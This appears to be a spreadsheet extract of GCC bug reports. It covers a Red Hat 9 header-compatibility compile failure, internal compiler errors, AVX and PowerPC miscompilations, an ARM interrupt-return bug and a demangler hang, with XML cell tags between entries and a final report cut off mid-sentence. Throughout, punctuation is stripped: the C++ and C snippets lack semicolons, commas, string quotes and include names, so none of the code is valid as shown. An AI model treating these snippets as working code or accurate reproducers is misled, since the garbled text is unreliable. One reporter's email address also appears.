 Content-Type: text/plain
 	name=bugs.txt
 Content-Transfer-Encoding: quoted-printable
 Content-Disposition: attachment
 	filename=bugs.txt
 Hear is a small program which give the following error when compiling =
 under
 redhat 9.0 but with redhat 7.0 it work fine when  using g++ or gcc
 *************************************************************
 #include 
 #include
 class Customer
 {
 private:
 	char mobileNo[11]
 	char name [25]
 	char dateofBirth [9]
 	char billingAddress [51]
 	char city [25]
 	char phoneNo [11]
 	float amountOutstanding
 public:
 	void print()
 	{
 	        cout &lt;&lt; endl &lt;&lt; Mobile Phone number:  
                 cout &lt;&lt; mobileNo &lt;&lt; endl
 		cout &lt;&lt; Name: 
 		cout &lt;&lt; name &lt;&lt; endl
 		cout &lt;&lt; Date of Birth: 
 		cout &lt;&lt; dateofBirth &lt;&lt; endl
 		cout &lt;&lt; Customer's billing address: 
 		cout &lt;&lt; billingAddress &lt;&lt; endl
 		cout &lt;&lt; City: 
 		cout &lt;&lt; city &lt;&lt; endl
 		cout &lt;&lt; Resident Phone number: 
 		cout &lt;&lt; phoneNo &lt;&lt; endl
 		cout &lt;&lt; Amount due: 
 		cout &lt;&lt; amountOutstanding &lt;&lt; endl
 	}
 	void get()
 	{
 		cout &lt;&lt; Mobile phone number: 
 		cin&gt;&gt; mobileNo
 		cin.ignore()
 		cout &lt;&lt; endl &lt;&lt; Name: 
 		cin.getline(name25)
 		cout &lt;&lt; endl &lt;&lt; Date of Birth: 
 		cin &gt;&gt; dateofBirth
 		cin.ignore()
 		cout &lt;&lt; endl &lt;&lt; Customer's billing address: 
 		cin.getline(billingAddress51)
 		cout &lt;&lt; endl &lt;&lt; City: 
 		cin.getline(city25)
 		cout &lt;&lt; endl &lt;&lt; Residence phone number: 
 		cin &gt;&gt; phoneNo
 		cout &lt;&lt; endl &lt;&lt; Amount due: 
 		cin &gt;&gt; amountOutstanding
 	}
 }
 int main ()
 {
 	Customer object
 	fstream file
 	char reply =3D 'Y'
 	file.open(customer.datios::out|ios::app)
 	while(reply =3D=3D 'Y' || reply =3D=3D 'Y')
 	{
 	=09
 		cout &lt;&lt; Enter Customer details  &lt;endl
 		object.get()
 		file.write((char *)
 		cout &lt;&lt; Do you wish to continue ?[y/n]
 		cin &gt;&gt; reply
 	}
 	file.close()
 	file.open (customer.datios::in)
 	file.read((char *)
 	while(file)
 	{
 		object.print()
 		file.read((char *)
 	}
 	file.close()
 	return 0
 } 	=09
 *****************************************************
 test1.cc: In member function `void Customer::print()':
 test1.cc:16: `cout' undeclared (first use this function)
 test1.cc:16: (Each undeclared identifier is reported only once for each
    function it appears in.)
 test1.cc:16: `endl' undeclared (first use this function)
 test1.cc: In member function `void Customer::get()':
 test1.cc:34: `cin' undeclared (first use this function)
 test1.cc: In function `int main()':
 test1.cc:54: `fstream' undeclared (first use this function)
 test1.cc:54: parse error before `' token
 test1.cc:56: `file' undeclared (first use this function)
 test1.cc:56: `ios' undeclared (first use this function)
 test1.cc:56: parse error before `::' token
 /usr/include/c++/3.2.2/iostream:51:   also declared as `std::ostream =
 std::cout'
    here
 /usr/include/c++/3.2.2/ostream:257:   also declared as `
    std::basic_ostream&amp; =
 std::endl(std::basic_ostream&lt;_CharT
    _Traits&gt;&amp;)' here
 /usr/include/c++/3.2.2/iostream:51:   also declared as `std::ostream =
 std::cout'
    here
 /usr/include/c++/3.2.2/iostream:50:   also declared as `std::istream =
 std::cin'
    here
 test1.cc:67: parse error before `::' token
 ************************************************************************w=
 hen i incude using namespace std
 ************************************************************************i=
 t give that error
 test1.cc: In function `int main()':
 test1.cc:61: no match for `std::basic_ostream&lt;char =
 std::char_traits &gt;&amp; &lt;
    ' operator
 ************************************************************************a=
 n another small one
 #include 
 int main()
 {
 	cout &lt;&lt; hello
 	return 0
 }
 ************************************************************************i=
 t give the following error
 In file included from /usr/include/c++/3.2.2/backward/iostream.h:31
                  from hello.cc:1:
 /usr/include/c++/3.2.2/backward/backward_warning.h:32:2: warning: =
 #warning This
 file includes at least one deprecated or antiquated header. Please =
 consider using one of the 32 headers found in section 17.4.1.2 of the =
 C++ standard. Examples
 include substituting the  header for the  header for C++ =
 includes or  instead of the deprecated header . =
 To disable this warning
 use -Wno-deprecated.
 But when compiling this one
 #include 
 int main()
 {
 	cout &lt;&lt; hello
 	return 0
 }
 the following error is given
 hello.cc: In function `int main()':
 hello.cc:4: `cout' undeclared (first use this function)
 hello.cc:4: (Each undeclared identifier is reported only once for each =
 function
    it appears in.)
 ********************************************************
 i have update the following package
 glibc-2.3.2-27.9.i386.rpm
 glibc-2.3.2-27.9.i686.rpm
 glibc-2.3.2-27.9.src.rpm
 glibc-common-2.3.2-27.9.i386.rpm
 glibc-debug-2.3.2-27.9.i386.rpm
 glibc-devel-2.3.2-27.9.i386.rpm
 glibc-profile-2.3.2-27.9.i386.rpm
 glibc-utils-2.3.2-27.9.i386.rpm
 nptl-devel-2.3.2-27.9.i686.rpm
 with out any result
 any one can help me
 ------=_NextPart_000_002E_01C31C5A.59D261A0--
Release:
unknown</t>
  </si>
  <si>
    <t>r-cassim</t>
  </si>
  <si>
    <t>GCC-6031</t>
  </si>
  <si>
    <t>-fprofile-arc -ftest-coverage + -fPIC = trouble on sparcv9</t>
  </si>
  <si>
    <t>GCC-46756</t>
  </si>
  <si>
    <t>-fcompare-debug failure (length) with ASSIGN</t>
  </si>
  <si>
    <t>Created attachment 22592
reduced testcase (from 20010519-1.f)
Compiler output (-w is not needed):
$ gcc -O -fcompare-debug pr46756.f -w
gcc: error: pr46756.f: -fcompare-debug failure (length)
$ diff pr46756.*gkd
89c8990
&lt;         (nil)))
---
&gt;         (nil))
&gt;  -&gt; 2)
Tested revisions:
r167331 - fail
4.5 r166509 - fail</t>
  </si>
  <si>
    <t>GCC-52754</t>
  </si>
  <si>
    <t>[4.7 Regression] indirect indexing broken with -fpredictive-commoning</t>
  </si>
  <si>
    <t>Created attachment 27022
testcase
The attached testcase is compiled to access the indexes array at bogus offsets. If line 8 is removed and line 7 written as
    unsigned int indexes[8] = { 0 1 2 3 4 5 6 7 }
the error disappears.
% /opt/gcc-4.7.0/bin/g++ -msse2 -v -O1 -fpredictive-commoning main.cpp
Using built-in specs.
COLLECT_GCC=/opt/gcc-4.7.0/bin/g++
COLLECT_LTO_WRAPPER=/opt/gcc-4.7.0/libexec/gcc/x86_64-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ./configure --prefix=/opt/gcc-4.7.0 --build=x86_64-linux-gnu --host=x86_64-linux-gnu --enable-languages=cc++fortran --with-gmp=/opt/gcc-4.7.0 --with-mpfr=/opt/gcc-4.7.0 --with-ppl=/opt/gcc-4.7.0 --with-cloog=/opt/gcc-4.7.0 --with-libelf=/opt/gcc-4.7.0 --with-mpc=/opt/gcc-4.7.0 --enable-lto
Thread model: posix
gcc version 4.7.0 (GCC)
COLLECT_GCC_OPTIONS='-msse2' '-v' '-O1' '-fpredictive-commoning' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /opt/gcc-4.7.0/libexec/gcc/x86_64-linux-gnu/4.7.0/cc1plus -quiet -v -imultiarch x86_64-linux-gnu -D_GNU_SOURCE main.cpp -quiet -dumpbase main.cpp -msse2 -mtune=generic -march=x86-64 -auxbase main -O1 -version -fpredictive-commoning -o /tmp/ccmv6Zx9.s
GNU C++ (GCC) version 4.7.0 (x86_64-linux-gnu)
        compiled by GNU C version 4.7.0 GMP version 5.0.4 MPFR version 3.1.0 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/../../../../x86_64-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/../../../../include/c++/4.7.0
 /opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/../../../../include/c++/4.7.0/x86_64-linux-gnu
 /opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/../../../../include/c++/4.7.0/backward
 /opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/include
 /usr/local/include
 /opt/gcc-4.7.0/include
 /opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
GNU C++ (GCC) version 4.7.0 (x86_64-linux-gnu)
        compiled by GNU C version 4.7.0 GMP version 5.0.4 MPFR version 3.1.0 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 32eb1a24aeca8b97e0c59b4b063f668f
COLLECT_GCC_OPTIONS='-msse2' '-v' '-O1' '-fpredictive-commoning' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/../../../../x86_64-linux-gnu/bin/as --64 -o /tmp/cca4x2R5.o /tmp/ccmv6Zx9.s
COMPILER_PATH=/opt/gcc-4.7.0/libexec/gcc/x86_64-linux-gnu/4.7.0/:/opt/gcc-4.7.0/libexec/gcc/x86_64-linux-gnu/4.7.0/:/opt/gcc-4.7.0/libexec/gcc/x86_64-linux-gnu/:/opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/:/opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/:/opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/../../../../x86_64-linux-gnu/bin/
LIBRARY_PATH=/opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/:/opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/../../../../lib64/:/lib/x86_64-linux-gnu/:/lib/../lib64/:/usr/lib/x86_64-linux-gnu/:/opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/../../../../x86_64-linux-gnu/lib/:/opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-msse2' '-v' '-O1' '-fpredictive-commoning' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /opt/gcc-4.7.0/libexec/gcc/x86_64-linux-gnu/4.7.0/collect2 --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 /usr/lib/x86_64-linux-gnu/crt1.o /usr/lib/x86_64-linux-gnu/crti.o /opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/crtbegin.o -L/opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0 -L/opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/../../../../lib64 -L/lib/x86_64-linux-gnu -L/lib/../lib64 -L/usr/lib/x86_64-linux-gnu -L/opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/../../../../x86_64-linux-gnu/lib -L/opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/../../.. /tmp/cca4x2R5.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /opt/gcc-4.7.0/lib/gcc/x86_64-linux-gnu/4.7.0/crtend.o /usr/lib/x86_64-linux-gnu/crtn.o
% ./a.out
[1]    7716 bus error  ./a.out</t>
  </si>
  <si>
    <t>GCC-70628</t>
  </si>
  <si>
    <t>[5 regression] ICE in get_reg_rtx at emit-rtl.c:1025</t>
  </si>
  <si>
    <t>Created attachment 38237
Preprocessed source
$ gcc/xgcc -B gcc/ -O2 -g -S -mabi=ilp32 disk.i
disk/disk.c: In function â€˜gp_port_library_listâ€™:
disk/disk.c:305:1: internal compiler error: in gen_reg_rtx at emit-rtl.c:1025
0x7f30d3 gen_reg_rtx(machine_mode)
        ../../gcc/emit-rtl.c:1025
0x8297b3 convert_modes(machine_mode machine_mode rtx_def* int)
        ../../gcc/expr.c:723
0x777a5b cselib_expand_value_rtx_1
        ../../gcc/cselib.c:1832
0x779acb cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        ../../gcc/cselib.c:1540
0xdfa043 vt_expand_var_loc_chain
        ../../gcc/var-tracking.c:8329
0xdfa043 vt_expand_loc_callback
        ../../gcc/var-tracking.c:8492
0x77790b cselib_expand_value_rtx_1
        ../../gcc/cselib.c:1693
0x779acb cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        ../../gcc/cselib.c:1540
0xdf9cbf vt_expand_loc_callback
        ../../gcc/var-tracking.c:8426
0x777747 cselib_expand_value_rtx_1
        ../../gcc/cselib.c:1658
0x779acb cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        ../../gcc/cselib.c:1540
0xdfa043 vt_expand_var_loc_chain
        ../../gcc/var-tracking.c:8329
0xdfa043 vt_expand_loc_callback
        ../../gcc/var-tracking.c:8492
0x77790b cselib_expand_value_rtx_1
        ../../gcc/cselib.c:1693
0x777973 cselib_expand_value_rtx_1
        ../../gcc/cselib.c:1731
0x779acb cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        ../../gcc/cselib.c:1540
0xdfa043 vt_expand_var_loc_chain
        ../../gcc/var-tracking.c:8329
0xdfa043 vt_expand_loc_callback
        ../../gcc/var-tracking.c:8492
0x77790b cselib_expand_value_rtx_1
        ../../gcc/cselib.c:1693
0x779acb cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        ../../gcc/cselib.c:1540
Needs -O &gt;= 2 -g &gt;= 2 and -mabi=ilp32.</t>
  </si>
  <si>
    <t>GCC-7960</t>
  </si>
  <si>
    <t>[arm] invalid code for c-code interrupt function</t>
  </si>
  <si>
    <t>Hi
  The arm-elf-gcc version 3.2 genrate wrong code when I compile a c-code interrupt function with option -mthumb-interwork.
  If compile the c-code interrupt function without option -mthumb-interwork It seems correct.
Release:
arm-elf-gcc verson 3.2
Environment:
Cygwin(Win32)
How-To-Repeat:
/*The c-code interrupt function to be compiled:(irq.c)*/
void ext_IRQ0_handler(void) __attribute__ ((interrupt (IRQ)))
/*-----------------------------------------------------*/
/* Function Name       : ext_IRQ0_handler              */
/*-----------------------------------------------------*/
void ext_IRQ0_handler(void)
{
    int i = 1
    return
}
If Compiled with: arm-elf-gcc -mthumb-interwork -gdwarf -c irq.c -o irq.o
Disassemble the irq.o:
irq.o:     file format elf32-littlearm
Disassembly of section .text:
00000000 :
   0:	e52dc004 	str	ip [sp -#4]!
   4:	e1a0c00d 	mov	ip sp
   8:	e24ee004 	sub	lr lr #4	 0x4
   c:	e92dd808 	stmdb	sp! {r3 fp ip lr pc}
  10:	e24cb004 	sub	fp ip #4	 0x4
  14:	e24dd004 	sub	sp sp #4	 0x4
  18:	e3a03001 	mov	r3 #1	 0x1
  1c:	e50b3018 	str	r3 [fp -#24]
  20:	e95b5808 	ldmdb	fp {r3 fp ip lr}^  /*This is wrong!!!!!*/
if Compiled with: arm-elf-gcc -gdwarf -c irq.c -o irq.o
Disassemble the irq.o:
irq.o:     file format elf32-littlearm
Disassembly of section .text:
00000000 :
   0:	e52dc004 	str	ip [sp -#4]!
   4:	e1a0c00d 	mov	ip sp
   8:	e24ee004 	sub	lr lr #4	 0x4
   c:	e92dd808 	stmdb	sp! {r3 fp ip lr pc}
  10:	e24cb004 	sub	fp ip #4	 0x4
  14:	e24dd004 	sub	sp sp #4	 0x4
  18:	e3a03001 	mov	r3 #1	 0x1
  1c:	e50b3018 	str	r3 [fp -#24]
  20:	e95b9808 	ldmdb	fp {r3 fp ip pc}^  /*This is maybe right!!!!*/
I need someone help me to resolve the problem as soon as possible Because it's very important to me Thank you very much.
My Email: dong_geming@hotmail.com</t>
  </si>
  <si>
    <t>dong_geming</t>
  </si>
  <si>
    <t>GCC-22039</t>
  </si>
  <si>
    <t>special functions for string concat of 3/4/5 args doc'ed to concat two</t>
  </si>
  <si>
    <t>All of the comments on
 System.String_Ops_Concat_[345].Str_Concat_[345]
read
   --  Concatenate two strings and return resulting string
                   ^^^
They do concatenate 3 to 5 strings respectively.
s-sopco[345].ads</t>
  </si>
  <si>
    <t>GCC-7620</t>
  </si>
  <si>
    <t>gij doesn't work properly on SH port.</t>
  </si>
  <si>
    <t>Automatic variable sized array is clobbered when the sjlj
exception is threw.
Compiler generates the code which _Unwind_SjLj_Register is
called before allocating stack for a variable sized array
which is automatic variable. So the stack pointer is set
higher than such arrays when the exception threw and the
contents of these arrays are clobbered.
Release:
3.3 20020808 (experimental)
Environment:
host: sh4-unknown-linux-gnu
build: sh4-unknown-linux-gnu
target: sh4-unknown-linux-gnu
How-To-Repeat:
Compile the following source with cc1plus for sh4-unknown-linux-gnu
target configured with --enable-sjlj-exceptions and look its
output.
-- aa.cc --
void foo (int)
void bar (int *) throw (int)
int a
void
f (int max_stack)
{
  int aa[max_stack]
  int *sp = aa
  try
    {
      bar (aa)
      return
    }
  catch (int e)
    {
      foo (e)
      a = *sp
    }
}</t>
  </si>
  <si>
    <t>GCC-55289</t>
  </si>
  <si>
    <t>darwin bootstrap fails due to missing libsanitizer/interception/mach_override directory and files</t>
  </si>
  <si>
    <t>The merge of the asan branch breaks the bootstrap on darwin due to the missing libsanitizer/interception/mach_override directory and associated files. These were never ported from llvm compiler-rt into the asan gcc branch. Manually adding the libsanitizer/interception/mach_override directory from the llvm compiler-rt 3.2 branch restores the bootstrap on x86_64-apple-darwin12.</t>
  </si>
  <si>
    <t>GCC-64605</t>
  </si>
  <si>
    <t>[5 Regression] ERROR: (DejaGnu) proc libatomic_target_compile lto1738.c lto1738.o object additional_flags=-flto does not exist.</t>
  </si>
  <si>
    <t>A fix for check_effective_target_lto (r219606) caused an ERROR in libatomic testsuite.
To reproduce: make check-target-libatomic
ERROR: (DejaGnu) proc libatomic_target_compile lto4486.c lto4486.o object additional_flags=-flto does not exist.
The error code is NONE
The info on the error is:
invalid command name libatomic_target_compile
    while executing
::tcl_unknown libatomic_target_compile lto4486.c lto4486.o object additional_flags=-flto
    (uplevel body line 1)
    invoked from within
uplevel 1 ::tcl_unknown $args</t>
  </si>
  <si>
    <t>GCC-12600</t>
  </si>
  <si>
    <t>Demangler goes in infinite loop for certain invalid mangled names.</t>
  </si>
  <si>
    <t>The demangler (bits/demangle.h) hangs on for example _Z1xINiEE</t>
  </si>
  <si>
    <t>GCC-9745</t>
  </si>
  <si>
    <t>[3.3/3.4 regression][powerpc] miscompiles libmcrypt (alias problem during loop)</t>
  </si>
  <si>
    <t>gcc-3.3 branch miscompiles libmcrypt-2.5.5/modules/algorithms/cast-256.c with -O2
Using -O1 works.
make check fails:
Algorithm: cast-256... failed compatibility
Expected: 5db4dd765f1d3835615a14afcb5dc2f5
Got: 5944c34942d241e42814575ac5da8404
Modes:
   cbc: failed
   cfb: failed
   ctr: failed
   ecb: failed
   ncfb: failed
   nofb: failed
   ofb: failed
Algorithm: cast-256... failed compatibility
Expected: 5db4dd765f1d3835615a14afcb5dc2f5
Got: a4851815627314e950b04aa86f183c50
Reading specs from /usr/lib/gcc-lib/powerpc-suse-linux/3.3/specs
Configured with: ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib --enable-languages=cc++f77objcjava --disable-checking --enable-libgcj --with-gxx-include-dir=/usr/include/g++ --with-slibdir=/lib --with-system-zlib --enable-shared --enable-__cxa_atexit powerpc-suse-linux
Thread model: posix  
gcc version 3.3 20030215 (prerelease) (SuSE Linux)
 /usr/lib/gcc-lib/powerpc-suse-linux/3.3/cc1 -E -quiet -v -I. -I. -I../.. -I. -I../.. -I../../lib -MD cast-256.d -MF .deps/cast-256.Tpo -MP -MT cast-256.lo -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 -D__PIC__=2 -D__pic__=2 -D__unix__ -D__gnu_linux__ -D__linux__ -Dunix -D__unix -Dlinux -D__linux -Asystem=unix -Asystem=posix -DHAVE_CONFIG_H -DPIC cast-256.c -fsigned-char -fPIC -O1 cast-256.i
ignoring duplicate directory .
ignoring duplicate directory .
ignoring duplicate directory ../..
#include ... search starts here:
#include  search starts here:
 .
 ../..
 ../../lib
 /usr/local/include
 /usr/lib/gcc-lib/powerpc-suse-linux/3.3/include
 /usr/powerpc-suse-linux/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/powerpc-suse-linux/3.3/cc1 -fpreprocessed cast-256.i -quiet -dumpbase cast-256.c -auxbase cast-256 -O1 -version -fsigned-char -fPIC -o cast-256.s
GNU C version 3.3 20030215 (prerelease) (SuSE Linux) (powerpc-suse-linux)
        compiled by GNU C version 3.3 20030215 (prerelease) (SuSE Linux).
 /usr/lib/gcc-lib/powerpc-suse-linux/3.3/../../../../powerpc-suse-linux/bin/as -mppc -V -Qy -K PIC -o cast-256.o cast-256.s
GNU assembler version 2.13.90.0.18 (powerpc-suse-linux) using BFD version 2.13.90.0.18 20030121 (SuSE Linux)
Release:
gcc version 3.3 20030215 (prerelease) (SuSE Linux)
Environment:
glibc 2.3.1cvs 20030213 binutils 2.13.90.0.18</t>
  </si>
  <si>
    <t>GCC-58493</t>
  </si>
  <si>
    <t>loop is not correctly optimized with O3 and AVX</t>
  </si>
  <si>
    <t>The following example (simplified from a proprietary numerical quant library issue) shows that AVX loop optimizer mis-compiles code below with both gcc-4.8.1 and gcc-4.7.3 : the first eight weights[2*i+1] values are wrong. 
Happens only when AVX instructions are available (i.e. -O3 -mavx). Does not happen with O2 or sse2. 
The fact that points[] and weights[] assignments are interleaved is important (no bug otherwise). 
Obviously example has to be run on a system that supports AVX.
///////////////////////// start
#include 
#include 
using namespace std
void omb(size_t n vector&amp; points vector&amp; weights) 
{
    points.resize(n) 
    weights.resize(n)
    for(int i=0i&lt;n/2i++)
    {
      points[2*i] = .7
      weights[2*i]= 5.
      points[2*i+1] = -.7
      weights[2*i+1]=weights[2*i] // mis-comiled
    }
}
int main()
{
  vector pw
  omb(18 p w)
  for(size_t i=0 i!= p.size() ++i)
    cout &lt;&lt; i=  &lt;&lt; i &lt;&lt;  p=  &lt;&lt; p[i] &lt;&lt;  w=  &lt;&lt; w[i] &lt;&lt; endl
}
/////////////////////////////// end
With gcc-4.7.3:
&gt; g++-4.7 --version &amp;&amp; g++-4.7 -O3 -mavx bug.cc &amp;&amp; ./a.out
g++-4.7 (Debian 4.7.3-6) 4.7.3
Copyright (C) 2012 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
i= 0 p= 0.7 w= 5
i= 1 p= -0.7 w= 0   ## BUG should be 5
i= 2 p= 0.7 w= 5
i= 3 p= -0.7 w= 0   ## BUG
i= 4 p= 0.7 w= 5
i= 5 p= -0.7 w= 0   ## BUG
i= 6 p= 0.7 w= 5
i= 7 p= -0.7 w= 0   ## BUG
i= 8 p= 0.7 w= 5
i= 9 p= -0.7 w= 0   ## BUG
i= 10 p= 0.7 w= 5
i= 11 p= -0.7 w= 0  ## BUG
i= 12 p= 0.7 w= 5
i= 13 p= -0.7 w= 0  ## BUG
i= 14 p= 0.7 w= 5
i= 15 p= -0.7 w= 0  ## BUG
i= 16 p= 0.7 w= 5
i= 17 p= -0.7 w= 5  ## right value
With gcc-4.8:
&gt; g++-4.8 --version &amp;&amp; g++-4.8 -O3 -mavx bug.cc &amp;&amp; ./a.out
g++-4.8 (Debian 4.8.1-10) 4.8.1
Copyright (C) 2013 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
i= 0 p= 0.7 w= 5
i= 1 p= -0.7 w= 0 # BUG as well as the next 7 odd-numbered entries
i= 2 p= 0.7 w= 5
i= 3 p= -0.7 w= 0
i= 4 p= 0.7 w= 5
i= 5 p= -0.7 w= 0
i= 6 p= 0.7 w= 5
i= 7 p= -0.7 w= 0
i= 8 p= 0.7 w= 5
i= 9 p= -0.7 w= 0
i= 10 p= 0.7 w= 5
i= 11 p= -0.7 w= 0
i= 12 p= 0.7 w= 5
i= 13 p= -0.7 w= 0
i= 14 p= 0.7 w= 5
i= 15 p= -0.7 w= 0
i= 16 p= 0.7 w= 5
i= 17 p= -0.7 w= 5
Same but SSE2 not AVX: initialized correctly.
&gt; g++-4.8 --version &amp;&amp; g++-4.8 -O3 -msse2 bug.cc &amp;&amp; ./a.out
g++-4.8 (Debian 4.8.1-10) 4.8.1
Copyright (C) 2013 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
i= 0 p= 0.7 w= 5
i= 1 p= -0.7 w= 5 # OK
i= 2 p= 0.7 w= 5
i= 3 p= -0.7 w= 5
i= 4 p= 0.7 w= 5
i= 5 p= -0.7 w= 5
i= 6 p= 0.7 w= 5
i= 7 p= -0.7 w= 5
i= 8 p= 0.7 w= 5
i= 9 p= -0.7 w= 5
i= 10 p= 0.7 w= 5
i= 11 p= -0.7 w= 5
i= 12 p= 0.7 w= 5
i= 13 p= -0.7 w= 5
i= 14 p= 0.7 w= 5
i= 15 p= -0.7 w= 5
i= 16 p= 0.7 w= 5
i= 17 p= -0.7 w= 5
Now gcc-4.6 &amp; AVX : no bug
&gt; g++-4.6 --version &amp;&amp; g++-4.6 -O3 -mavx bug.cc &amp;&amp; ./a.out
g++-4.6 (Debian 4.6.4-4) 4.6.4
Copyright (C) 2011 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
i= 0 p= 0.7 w= 5
i= 1 p= -0.7 w= 5 # OK
i= 2 p= 0.7 w= 5
i= 3 p= -0.7 w= 5
i= 4 p= 0.7 w= 5
i= 5 p= -0.7 w= 5
i= 6 p= 0.7 w= 5
i= 7 p= -0.7 w= 5
i= 8 p= 0.7 w= 5
i= 9 p= -0.7 w= 5
i= 10 p= 0.7 w= 5
i= 11 p= -0.7 w= 5
i= 12 p= 0.7 w= 5
i= 13 p= -0.7 w= 5
i= 14 p= 0.7 w= 5
i= 15 p= -0.7 w= 5
i= 16 p= 0.7 w= 5
i= 17 p= -0.7 w= 5
Regards
Vladimir</t>
  </si>
  <si>
    <t>vgrebinski</t>
  </si>
  <si>
    <t>GCC-5533</t>
  </si>
  <si>
    <t>g++ segfaults when processing std::accumulate(begin end init invalid_op)</t>
  </si>
  <si>
    <t>Duh sorry: Invalid attachement...
g++ segfaults when it has to processing std::accumulate(begin end init invalid_op) where invalid_op is a invalid template reference.
Release:
3.0.2
Environment:
System: Linux dali.sqx.lde 2.4.9-mosix #17 SMP Sam Sep 1 03:04:51 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /nfs/sam/opt/glibc/gcc-3.0.2/configure --prefix=/usr
How-To-Repeat:
See the attachement for preprocessed code. Here comes the plain code:
$ cat accum.cc
#include
#include
#include
int main()
{
    int nums[] = { 1 2 3 4 5 }
    std::cout &lt;&lt; std::accumulate(nums nums + sizeof(nums)/sizeof(*nums)
                                 0 std::plus) &lt;&lt; std::endl
}
$ LC_ALL=C g++ -save-temps accum.cc 
accum.cc: In function `int main()':
accum.cc:10: Internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$</t>
  </si>
  <si>
    <t>GCC-77945</t>
  </si>
  <si>
    <t>GCC generates invalid constexpr copy/move assignment operators for types with trailing padding.</t>
  </si>
  <si>
    <t>The copy/move assignment operators generated by GCC result in compile time error when used in a constant expression if the type contains trailing padding bytes (but one bytes between members).
Reproducer:
// g++ -std=c++1z test.cpp
struct OK {
  char no_padding = 0
  constexpr OK() {}
}
static_assert((OK{} = OK{} true) )
struct T {
  alignas(2) char with_padding = 0
  constexpr T() {}
}
// emits-error {{non-constant condition in static assert}}
// emits-error {{error accessing value of '' through a 'char [1]' glvalue in a constant expression}}
static_assert((T{} = T{} true) )</t>
  </si>
  <si>
    <t>GCC-47276</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE in function_and_variable_visibility at ipa.c:857 during compiling glibc.</t>
  </si>
  <si>
    <t>/local/devel/toolchain46/x86_64-gnu-linux.host64/bin/x86_64-gnu-linux-gcc \
-c  syslog.i -std=gnu99 -fgnu89-inline -O2 -fmerge-all-constants -fno-strict-aliasing \
-fwrapv -pipe -fPIC -fexceptions -o /dev/null
../sysdeps/unix/sysv/linux/syslog.c:10:0: internal compiler error: in function_and_variable_visibility at ipa.c:857
afaics there's no weakref like in PR47190 and PR47193.</t>
  </si>
  <si>
    <t>GCC-19022</t>
  </si>
  <si>
    <t>mmix-knuth-mmixware testsuite failure: gcc.dg/ftrapv-2.c ICE</t>
  </si>
  <si>
    <t>With LAST_UPDATED: Wed Dec 15 16:00:34 UTC 2004 I get:
FAIL: gcc.dg/ftrapv-2.c (test for excess errors)
WARNING: gcc.dg/ftrapv-2.c compilation failed to produce executable
With the message in the .log being:
/gcc/testsuite/gcc.dg/ftrapv-2.c: In function 'labsv':
/gcc/testsuite/gcc.dg/ftrapv-2.c:47: internal compiler error: in emit_move_insn
at expr.c:3026
This is a new test and likely never succeeded for this target.
The problem seems to be a call from expand_abs where the source and destination
of the move have different modes (DImode and SImode respectively) but the mode
